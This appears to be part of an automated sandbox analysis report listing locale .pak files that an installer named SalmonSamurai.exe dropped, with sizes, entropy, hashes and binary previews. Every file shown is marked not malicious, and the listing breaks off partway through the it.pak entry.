                                                                                                                                                                                                                                          SHA1:58CD673CE472F3F2F961CF8B69B0C8B8C01D457C
                                                                                                                                                                                                                                          SHA-256:E79C1E7A47250D88581E8E3BAF78DCAF31FE660B74A1E015BE0F4BAFDFD63E12
                                                                                                                                                                                                                                          SHA-512:165822C49CE0BDB82F3C3221E6725DAC70F53CFDAD722407A508FA29605BC669FB5E5070F825F02D830E0487B28925644438305372A366A3D60B55DA039633D7
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........M...h.....i.....j.....k.....l.(...n.0...o.5...p.B...r.H...s.Y...t.b...v.w...w.....y.....z.....|.....}.........................................................................P.....w.............................B.....N.....Z...................................+.....x...................................h.....y.............................&.....C.....a.................,.....4.....H.....o...................................!.....M.................8...............................................1....._.....w.................!.....2.....q.................J.....a.........................................,.....O.....|.........................................!.....3.....F.....^.......................,.................<.............................(.....;.....I.......................M.................T.................................../... .B...".e...%.....(.....*.7...+.:...,.X........./.....0.....1.m...3.....4.....5.#...6.....7.....8.....9. ...;.a...<.w...=.....>.....?.....@.....A.B...C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\en-GB.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):344606
                                                                                                                                                                                                                                          Entropy (8bit):5.5169703217013675
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:80kjE55JcUnMP9egFXwqfaYnT9Xa5alSeBNdg:80kQJZnM1XwWT05YScg
                                                                                                                                                                                                                                          MD5:D59E613E8F17BDAFD00E0E31E1520D1F
                                                                                                                                                                                                                                          SHA1:529017D57C4EFED1D768AB52E5A2BC929FDFB97C
                                                                                                                                                                                                                                          SHA-256:90E585F101CF0BB77091A9A9A28812694CEE708421CE4908302BBD1BC24AC6FD
                                                                                                                                                                                                                                          SHA-512:29FF3D42E5D0229F3F17BC0ED6576C147D5C61CE2BD9A2E658A222B75D993230DE3CE35CA6B06F5AFA9EA44CFC67817A30A87F4FAF8DC3A5C883B6EE30F87210
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..........h.h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.(...v.=...w.J...y.P...z._...|.e...}.w...........................................................................................................3.....;.....E.....c.....t.....v.....z...........................................................+.....:.....T.....g.....k.....q...................................................................................,.....:.....S.....h.....{.......................................................................+.....5.....A.....X.....h.................................................................(.....=.....R.....f.....m.....p.....q.....x..................................................... .....P.....].....h.......................................................................-.....D.....l....................................... .....".....%.....(.....*.....+.....,./.....@.../.N...0.W...1.....3.....4.....5.....6.....7.....8.....9.(...;.9...<.A...=.L...>.a...?.i...@.x...A...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\en-US.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):347111
                                                                                                                                                                                                                                          Entropy (8bit):5.508989875739037
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:xiLqIY2MuZYLMMP9ecGmM8faYdY4K55TiSbn8vMwS:xiLqIp34MM+mM0Y55eSKMwS
                                                                                                                                                                                                                                          MD5:5E3813E616A101E4A169B05F40879A62
                                                                                                                                                                                                                                          SHA1:615E4D94F69625DDA81DFAEC7F14E9EE320A2884
                                                                                                                                                                                                                                          SHA-256:4D207C5C202C19C4DACA3FDDB2AE4F747F943A8FAF86A947EEF580E2F2AEE687
                                                                                                                                                                                                                                          SHA-512:764A271A9CFB674CCE41EE7AED0AD75F640CE869EFD3C865D1B2D046C9638F4E8D9863A386EBA098F5DCEDD20EA98BAD8BCA158B68EB4BDD606D683F31227594
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..........:.h.....i.....j.*...k.9...l.D...n.L...o.Q...p.^...r.d...s.u...t.~...v.....w.....y.....z.....|.....}.........................................................................6.....C.....R.....b.....i.....r.................................................................#...........>.....E.....Q.....l.....~.................................................................2.....:.....F.....S.....W.....Z.....`.....p...................................................................................:.....A.....P...........................................................'.....5.....H.....K.....\.....l.....|...................................................................................E.....m.....t.......................................................................0.....I.....m......................................................... .....".....%.3...(.J...*.c...+.f...,.........../.....0.....1.....3.....4.....5.....6.J...7.Z...8.o...9.|...;.....<.....=.....>.....?.....@.....A...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\es-419.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):421147
                                                                                                                                                                                                                                          Entropy (8bit):5.3798866108688905
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:34e5fql0vt1s9zjzVMY/6+yN9d8piKkGp2Ioiw/QbuOXV5blUB0GLF96RRIHKxgY:34e5Sktm92Yfhpjq+5wLF96oSdc4
                                                                                                                                                                                                                                          MD5:7F6696CC1E71F84D9EC24E9DC7BD6345
                                                                                                                                                                                                                                          SHA1:36C1C44404EE48FC742B79173F2C7699E1E0301F
                                                                                                                                                                                                                                          SHA-256:D1F17508F3A0106848C48A240D49A943130B14BD0FEB5ED7AE89605C7B7017D1
                                                                                                                                                                                                                                          SHA-512:B226F94F00978F87B7915004A13CDBD23DE2401A8AFAA2517498538967DF89B735F8ECC46870C92E3022CAC795218A60AD2B8FFF1EFAD9FEEA4EC193704A568A
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........b...h.&...i./...j.;...k.J...l.U...n.]...o.b...p.o...r.u...s.....t.....v.....w.....y.....z.....|.....}.........................................................................B.....T.....c.....x.................................................................I.....c.....k.....y............................................... .....%.....-.....?.....c.....t...........................................................2.....M.....d...............................................#.....6.....E.....W.....o.....w.........................................B.....N.....a.....m...........................................................$.....'.....(.....1.....:.....C.....J.....[.................2.....:.........................................+.....6.....?.....D.....]...................................@.....Y....._.....g.....u............... .....".....%.....(.....*.....+.....,.<.....b.../.....0.....1.....3.....4.....5.....6.[...7.m...8.....9.....;.....<.....=.....>.....?.....@.....A.1...C.X...D.b.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\es.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):421332
                                                                                                                                                                                                                                          Entropy (8bit):5.349883254359391
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:fILAyMcQXU0+/3IgsC5pN+v6Idj3J5Orj7FQoz7L66PZqS:ALAyNQCsupUv6gj3J5OrmoznGS
                                                                                                                                                                                                                                          MD5:A36992D320A88002697DA97CD6A4F251
                                                                                                                                                                                                                                          SHA1:C1F88F391A40CCF2B8A7B5689320C63D6D42935F
                                                                                                                                                                                                                                          SHA-256:C5566B661675B613D69A507CBF98768BC6305B80E6893DC59651A4BE4263F39D
                                                                                                                                                                                                                                          SHA-512:9719709229A4E8F63247B3EFE004ECFEB5127F5A885234A5F78EE2B368F9E6C44EB68A071E26086E02AA0E61798B7E7B9311D35725D3409FFC0E740F3AA3B9B5
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........Z...h.....i.....j.*...k.9...l.D...n.L...o.Q...p.^...r.d...s.u...t.~...v.....w.....y.....z.....|.....}.........................................................................:.....M.....].....r...........................................................(.....G.....a.....i.....w.....................................................!.....).....;.....N....._.................................................................3.....S.....}............................................... .....-.....>.....V.....^.....o...................................5.....@.....J.....V.....h.............................................................................'.....0.....7.....H.................3.....;.........................................+.....6.....B.....G....._.........................................G.....M.....U.....c............... .....".....%.....(.....*.....+.....,.).....C.../.]...0.d...1.....3.....4.....5.....6.6...7.G...8.\...9.n...;.....<.....=.....>.....?.....@.....A.....C.1...D.;.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\et.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):380687
                                                                                                                                                                                                                                          Entropy (8bit):5.464870724176939
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:2Mg++J/xRN0JLnrC4HFJbT/RauiQ/G5LjR43f7LQkPQW:2MmJnq7DG5LjQ
                                                                                                                                                                                                                                          MD5:A94E1775F91EA8622F82AE5AB5BA6765
                                                                                                                                                                                                                                          SHA1:FF17ACCDD83AC7FCC630E9141E9114DA7DE16FDB
                                                                                                                                                                                                                                          SHA-256:1606B94AEF97047863481928624214B7E0EC2F1E34EC48A117965B928E009163
                                                                                                                                                                                                                                          SHA-512:A2575D2BD50494310E8EF9C77D6C1749420DFBE17A91D724984DF025C47601976AF7D971ECAE988C99723D53F240E1A6B3B7650A17F3B845E3DAEEFAAF9FE9B9
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........m...h.<...i.M...j.Y...k.h...l.s...n.{...o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................!.....(...../.....6.....7.....8.....:.....l.....|...............................................,.....B.....D.....H.....p.................................................................5.....B.....H.....P.....^.....m.....v.......................................................................-.....F.....Z.....o.......................................................................0.....=.....W.....e.................................................................-.....B.....V.....m.....t.....w.....x...............................................U.....[...............................................$.....).....,.....<.....b.....x.........................................$.....6.....O.....Z... .d...".w...%.....(.....*.....+.....,....... .../.8...0.E...1.n...3.y...4.....5.....6.....7.....8.....9.+...;.>...<.K...=.T...>.g...?.o...@.~...A.....C.....D...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\fa.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):622184
                                                                                                                                                                                                                                          Entropy (8bit):5.029655615738747
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:Kxw5iX9nuyaXTfwHxwNUWGOGfStQEvy1zeItDmNtua/1wMTAKzIxRAQiHedNu36/:Kxw5YuyaXTfwRwNUWGOGfStQEvy1zeIR
                                                                                                                                                                                                                                          MD5:9D273AF70EAFD1B5D41F157DBFB94FDC
                                                                                                                                                                                                                                          SHA1:DA98BDE34B59976D4514FF518BD977A713EA4F2E
                                                                                                                                                                                                                                          SHA-256:319D1E20150D4E3F496309BA82FCE850E91378EE4B0C7119A003A510B14F878B
                                                                                                                                                                                                                                          SHA-512:0A892071BEA92CC7F1A914654BC4F9DA6B9C08E3CB29BB41E9094F6120DDC7A08A257C0D2B475C98E7CDCF604830E582CF2A538CC184056207F196FFC43F29AD
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:............h.z...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|."...}.4.....<.....A.....I.....Q.....Y.....`.....g.....n.....p.....u.............................,.....5.....].....k.....u...................................A.....p.....v...................................E.....`.........................................T.....y.....................................................8.....W.......................+.....F.....N.....V.....].....g.....x.............................+.....B....._.............................3.....B.....\.....r.........................................-.....J.....Q.....T.....e.....v.....................................................s............................./.....7.....J.....V.....b.......................$.....J.....w...................................G.....Z... .m...".....%.....(.....*.(...+.+...,.I.....m.../.....0.....1.....3.....4.+...5._...6.....7.....8.....9.G...;.W...<.i...=.}...>.....?.....@.....A.....C.V...D.}...E...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\fi.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):389118
                                                                                                                                                                                                                                          Entropy (8bit):5.427253181023048
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:nEbM+RtZ9eC6cMkohGZxGseSFOE/xaWEkLl5W5ucHiEi18OWUcrOShPGNgX1wL2:V+/upPgZxaS5W5xHiEi18OWUsU2
                                                                                                                                                                                                                                          MD5:D4B776267EFEBDCB279162C213F3DB22
                                                                                                                                                                                                                                          SHA1:7236108AF9E293C8341C17539AA3F0751000860A
                                                                                                                                                                                                                                          SHA-256:297E3647EAF9B3B95CF833D88239919E371E74CC345A2E48A5033EBE477CD54E
                                                                                                                                                                                                                                          SHA-512:1DC7D966D12E0104AACB300FD4E94A88587A347DB35AD2327A046EF833FB354FD9CBE31720B6476DB6C01CFCB90B4B98CE3CD995E816210B1438A13006624E8F
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:............h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.(...|.....}.@.....H.....M.....U.....].....e.....l.....s.....z.....{.....|...........................................................$....._.....x.....z.....~.....................................................7.....E.....R.....f.....v.....|...........................................................".....,.....2.....Q.....j.................................................................&.....3.....H.....N.....V...............................................!.....-.....>.....O.....R.....`.....r.............................................................................9.............................,.....?.....h.....w...........................................................5.....X............................................. .....".....%.....(.3...*.S...+.V...,.t........./.....0.....1.....3.....4.....5.6...6.p...7.....8.....9.....;.....<.....=.....>.....?.#...@.B...A.z...C.....D.....E...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\fil.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):438088
                                                                                                                                                                                                                                          Entropy (8bit):5.195613019166525
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:2zHaVyEDQV5aZrU+5xeuhGjZ3ZmA58Pm+7JATvy8:2zNMdU4XA5Imb
                                                                                                                                                                                                                                          MD5:3165351C55E3408EAA7B661FA9DC8924
                                                                                                                                                                                                                                          SHA1:181BEE2A96D2F43D740B865F7E39A1BA06E2CA2B
                                                                                                                                                                                                                                          SHA-256:2630A9D5912C8EF023154C6A6FB5C56FAF610E1E960AF66ABEF533AF19B90CAA
                                                                                                                                                                                                                                          SHA-512:3B1944EA3CFCBE98D4CE390EA3A8FF1F6730EB8054E282869308EFE91A9DDCD118290568C1FC83BD80E8951C4E70A451E984C27B400F2BDE8053EA25B9620655
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..........].h.....i.....j.....k.....l.....n.....o.....p.&...r.,...s.=...t.F...v.[...w.h...y.n...z.}...|.....}...........................................................................................5.....<.....E.....d.....l.....y...................................................../.....E.....O.....^.....................................................".....8.......................................................................%.....J.....d.....~.................................................................+.....h.....q.....}...................................&.....4.....I.....o.....r................................................................. .....*.....5.....>.....O.................(.....0.................................................................,.....R.....l.............................6.....=.....H.....Y............... .....".....%.....(.....*.....+.....,.*.....B.../.W...0.`...1.....3.....4.....5.....6.....7.3...8.O...9.d...;.}...<.....=.....>.....?.....@.....A...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\fr.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):454982
                                                                                                                                                                                                                                          Entropy (8bit):5.385096169417585
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:07bju28t6QuagV1ZztzYpZ4MYnYM/LDBW5Mx0q20wCbKZL3wfzkCh1f/5FEs6rYr:6JVzbf55Z
                                                                                                                                                                                                                                          MD5:0BF28AFF31E8887E27C4CD96D3069816
                                                                                                                                                                                                                                          SHA1:B5313CF6B5FBCE7E97E32727A3FAE58B0F2F5E97
                                                                                                                                                                                                                                          SHA-256:2E1D413442DEF9CAE2D93612E3FD04F3AFAF3DD61E4ED7F86400D320AF5500C2
                                                                                                                                                                                                                                          SHA-512:95172B3B1153B31FCEB4B53681635A881457723CD1000562463D2F24712267B209B3588C085B89C985476C82D9C27319CB6378619889379DA4FAE1595CB11992
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........>...h.....i.....j.....k.....l.....n.....o."...p./...r.5...s.F...t.O...v.d...w.q...y.w...z.....|.....}...........................................................................................1.....<.....E.....g.....s.....{.....................................................+.....<.....I.....W..............................................."...........j.......................................................................,.....M.....p.......................................................................T.....b.....l.........................................+.....:.....R.....U.....l...................................................................................[.......................$.....9.....N.................................................................X.........................................$.....E.....O... .[...".t...%.....(.....*.....+.....,.........../.#...0.1...1.n...3.....4.....5.....6.....7.....8.4...9.J...;.]...<.k...=.}...>.....?.....@.....A.....C.(...D.:.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\gu.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):879149
                                                                                                                                                                                                                                          Entropy (8bit):4.32399215971305
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:Xz2UMY57hmdUoITsKMaWZKerbtsMhmksd4M+0+z20QmuOAl5VpvoxWnhygfZw/gQ:D2UMY57h9w4MSbsp5cLhdKE8
                                                                                                                                                                                                                                          MD5:7B5F52F72D3A93F76337D5CF3168EBD1
                                                                                                                                                                                                                                          SHA1:00D444B5A7F73F566E98ABADF867E6BB27433091
                                                                                                                                                                                                                                          SHA-256:798EA5D88A57D1D78FA518BF35C5098CBEB1453D2CB02EF98CD26CF85D927707
                                                                                                                                                                                                                                          SHA-512:10C6F4FAAB8CCB930228C1D9302472D0752BE19AF068EC5917249675B40F22AB24C3E29EC3264062826113B966C401046CFF70D91E7E05D8AADCC0B4E07FEC9B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........N...h.....i.....j.$...k.3...l.>...n.F...o.K...p.X...r.^...s.o...t.x...v.....w.....y.....z.....|.....}.............................................................................................................T.....l.................'.....).....5.....].......................4.....S.....i.............................l.................................................................'.....k.....t.....w.............................a.................;.....[.....n.....v.....}.......................+.....:.....f.......................X.....y...........].....s...................................6.....X.....w...............................................-.....L.....c....................... .....B.................Q.............................3.....?.....K.....}...................................o.............................3.....[... .a...".....%.....(.....*.g...+.j...,.........../.....0.....1.~...3.....4.....5.....6.[...7.....8.....9.....;.Q...<.h...=.....>.....?.....@.....A.D...C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\he.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):544193
                                                                                                                                                                                                                                          Entropy (8bit):4.6265566170608325
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:DczykRrlOUmTU2/S9iyBZ60DAf1X2VeQCap4M52QoLpMzu5flmd9DnwWHQgZ:+F55VoQ
                                                                                                                                                                                                                                          MD5:6D787DC113ADFB6A539674AF7D6195DB
                                                                                                                                                                                                                                          SHA1:F966461049D54C61CDD1E48EF1EA0D3330177768
                                                                                                                                                                                                                                          SHA-256:A976FAD1CC4EB29709018C5FFCC310793A7CEB2E69C806454717CCAE9CBC4D21
                                                                                                                                                                                                                                          SHA-512:6748DAD2813FC544B50DDEA0481B5ACE3EB5055FB2D985CA357403D3B799618D051051B560C4151492928D6D40FCE9BB33B167217C020BDCC3ED4CAE58F6B676
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........)...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.%...v.:...w.G...y.M...z.\...|.b...}.t.....|.............................................................................2.....K.....^.....w.....................................................4.....O.....f.....y.............................%.....:....._.....r.....z...................................9.....A.....K.....g...............................................C.....m............................................... .....<.....d.....n...................................2.....}...................................!.....$.....7.....N.....a.....y................................................................._.........../.....9.............................".....:.....@.....L.....].....e.............................$....._............................................. .1...".L...%.}...(.....*.....+.....,.........../.....0.....1.W...3.l...4.....5.....6.....7.....8.1...9.E...;.Z...<.t...=.....>.....?.....@.....A.B...C.u.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\hi.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):921748
                                                                                                                                                                                                                                          Entropy (8bit):4.3093889077968495
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:zGFGsUtYgPLdROwJgdkFSvf4QAEm5dmGhsYK/GR3TX4/NMdpqdYnLsuFQdXPtg8y:zGEAgT/Zu5J57JtK
                                                                                                                                                                                                                                          MD5:1766A05BE4DC634B3321B5B8A142C671
                                                                                                                                                                                                                                          SHA1:B959BCADC3724AE28B5FE141F3B497F51D1E28CF
                                                                                                                                                                                                                                          SHA-256:0EEE8E751B5B0AF1E226106BEB09477634F9F80774FF30894C0F5A12B925AC35
                                                                                                                                                                                                                                          SHA-512:FAEC1D6166133674A56B5E38A68F9E235155CC910B5CCEB3985981B123CC29EDA4CD60B9313AB787EC0A8F73BF715299D9BF068E4D52B766A7AB8808BD146A39
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........"...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.,...w.9...y.?...z.N...|.T...}.f.....n.....s.....{.....................................................6.....X.....}.............................&.....@...................................%.....S.....y.......................&.............................Z.....j.....................................................2.....n.....w.....z.......................A.................).....o..............................................._.....n.................7.....T...............................................$.....n.....q............................./.....b.....i.....l.....n.........................................R...................................Z.....z...................................5.................q.................\...................................0... .K...".k...%.....(.....*.2...+.5...,.S........./.....0.....1.p...3.....4.....5.....6._...7.....8.....9.....;.^...<.r...=.....>.....?.....@.....A.;...C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\hr.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):423481
                                                                                                                                                                                                                                          Entropy (8bit):5.516218200944141
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:yL0fCmEZW/FhjNmvgVRTKBOS+/6ocIG0uPXuyAF6WI6DkYAiKbeM/ogQbn7xjemW:QYCmNLjN3pV5v5tE77ORS
                                                                                                                                                                                                                                          MD5:8F9498D18D90477AD24EA01A97370B08
                                                                                                                                                                                                                                          SHA1:3868791B549FC7369AB90CD27684F129EBD628BE
                                                                                                                                                                                                                                          SHA-256:846943F77A425F3885689DCF12D62951C5B7646E68EADC533B8B5C2A1373F02E
                                                                                                                                                                                                                                          SHA-512:3C66A84592DEBE522F26C48B55C04198AD8A16C0DCFA05816825656C76C1C6CCCF5767B009F20ECB77D5A589EE44B0A0011EC197FEC720168A6C72C71EBF77FD
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........h...h.2...i.C...j.O...k.^...l.i...n.q...o.v...p.....r.....s.....t.....v.....w.....y.....z.....|.....}...........................................%.....,.....-...........0.....Y.....e.....q.................................................................A.....T.....p.....x...........................................................".....*.....8.....G.....X.............................................................................%.....B.....c.......................................................................G.....U.....a.....w.............................................../.....2.....B.....S.....f.....|.................................................................(.....g.............................8.....l.....{.....................................................I.....h................................................... .....".0...%.U...(.r...*.....+.....,.........../.....0.....1.....3.)...4.F...5.d...6.....7.....8.....9.....;.....<.....=.....>.4...?.=...@.N...A.....C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\hu.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):456789
                                                                                                                                                                                                                                          Entropy (8bit):5.643595706627357
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:SGAK2lkJ2gSSSfLOAYkky1MV5QgsZfGRAxY62R9PSam7EEOEeLvx5gR4RStG2r2/:pAKWkJ2gSsAkV5QgsiR4747vx5VL/
                                                                                                                                                                                                                                          MD5:F5E1CA8A14C75C6F62D4BFF34E27DDB5
                                                                                                                                                                                                                                          SHA1:7ABA6BFF18BDC4C477DA603184D74F054805C78F
                                                                                                                                                                                                                                          SHA-256:C0043D9FA0B841DA00EC1672D60015804D882D4765A62B6483F2294C3C5B83E0
                                                                                                                                                                                                                                          SHA-512:1050F96F4F79F681B3EAF4012EC0E287C5067B75BA7A2CBE89D9B380C07698099B156A0EB2CBC5B8AA336D2DAA98E457B089935B534C4D6636987E7E7E32B169
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........6...h.....i.....j.....k.....l.....n.....o.....p.....r.#...s.4...t.=...v.R...w._...y.e...z.t...|.z...}.....................................................................................2.....G.....W.....q.....................................................9.....X.....d.....}...............................................0.....5.....;.....N.....^.....s.....................................................-.....G.....d.....z.......................#.....?.....H.....P.....W.....].....l...............................................(.....Q.....x...........................................................;.....`.....u.....|...............................................1.......................b.....w...........................................................K.....l.......................5.....L.....T....._.....w............... .....".....%.....(.....*.8...+.;...,.Y.....j.../.....0.....1.....3.....4.....5.....6.P...7.k...8.....9.....;.....<.....=.....>.....?.....@.....A.0...C.U...D.b.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\id.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):373937
                                                                                                                                                                                                                                          Entropy (8bit):5.37852966615304
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:Fl9jv1p49ahfjDVnjHFsRmP28Wvr5PdhpvtEDSVsEaOq:FlLpblVnjHFCm+8Sr5Pdhzq
                                                                                                                                                                                                                                          MD5:7B39423028DA71B4E776429BB4F27122
                                                                                                                                                                                                                                          SHA1:CB052AB5F734D7A74A160594B25F8A71669C38F2
                                                                                                                                                                                                                                          SHA-256:3D95C5819F57A0AD06A118A07E0B5D821032EDCF622DF9B10A09DA9AA974885F
                                                                                                                                                                                                                                          SHA-512:E40679B01AB14B6C8DFDCE588F3B47BCAFF55DBB1539B343F611B3FCBD1D0E7D8C347A2B928215A629F97E5F68D19C51AF775EC27C6F906CAC131BEAE646CE1A
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........@...h.....i.....j.....k.....l.....n.!...o.&...p.3...r.9...s.J...t.S...v.h...w.u...y.{...z.....|.....}.................................................................................................5.....=.....T.....[.....e.......................................................................,.....J.....[.....h.............................................................................;.....?.....B.....G.....[.....j.....~.................................................................*.....F.....L.....a.........................................6.....H.....Q.....\.....r.........................................................................................!.....'.....3.....a.........................................C.....M.....Y.....`.....h.....o.....v.........................................>.....Q.....V.....\.....i............... .....".....%.....(.....*.....+.....,.#.....3.../.B...0.F...1.z...3.....4.....5.....6.....7.....8.....9.'...;.5...<.>...=.K...>.`...?.h...@.y...A...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\it.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):414412
                                                                                                                                                                                                                                          Entropy (8bit):5.287149423624235
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:8cPuDjrpxctogSrqRrhsO11RT9TeexAGTL6+q2WKLV9fLwY+25OM388HrmwGWNBI:8cmDZREZJy8KL1LjAS5ZzoC
                                                                                                                                                                                                                                          MD5:D58A43068BF847C7CD6284742C2F7823
                                                                                                                                                                                                                                          SHA1:497389765143FAC48AF2BD7F9A309BFE65F59ED9
